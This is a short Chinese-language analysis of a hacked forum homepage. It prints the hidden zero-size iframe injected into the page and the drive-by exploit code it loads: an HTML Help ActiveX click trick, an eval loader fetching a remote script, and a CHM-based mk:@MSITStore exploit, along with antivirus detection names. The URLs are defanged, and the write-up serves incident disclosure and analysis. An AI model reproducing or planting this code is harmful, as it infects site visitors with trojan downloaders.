坛首页被加入:
------------------ <iframe src="hxxp://msbyl***.***go1.icpcn.com/" width="0" height="0" frameborder="0"></iframe> ------------------
hxxp://msbyl***.***go1.icpcn.com/的代码为:
------------------ <SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://msbyl***.***go1.icpcn.com/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML> <html> <iframe src="hxxp://msby***.go***1.icpcn.com/" width="0" height="0" frameborder="0"></iframe> </html> <script src='hxxp://s52.cnzz.com/stat.php?id=202256&web_id=202256&online=1&show=line' language='JavaScript' charset='gb2312'></script> ---------------- bbs003302.gif Kaspersky报为:exploit.VBS.Phel.m bbs003302.css Kaspersky报为:Trojan-Downloader.Win32.Tiny.cj hxxp://msby***.go***1.icpcn.com/的代码为: ---------------- <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:/.mht!hxxp://msby***.go***1.icpcn.com/help.txt::/%23%2E%68%74m"></OBJECT> <script src='hxxp://s53.cnzz.com/stat.php?id=204586&web_id=204586&online=1&show=line' language='JavaScript' charset='gb2312'></script> ----------------
help.txt 其实是一个CHM文件,Kaspersky报为:Trojan-Downloader.Win32.Tiny.cj。
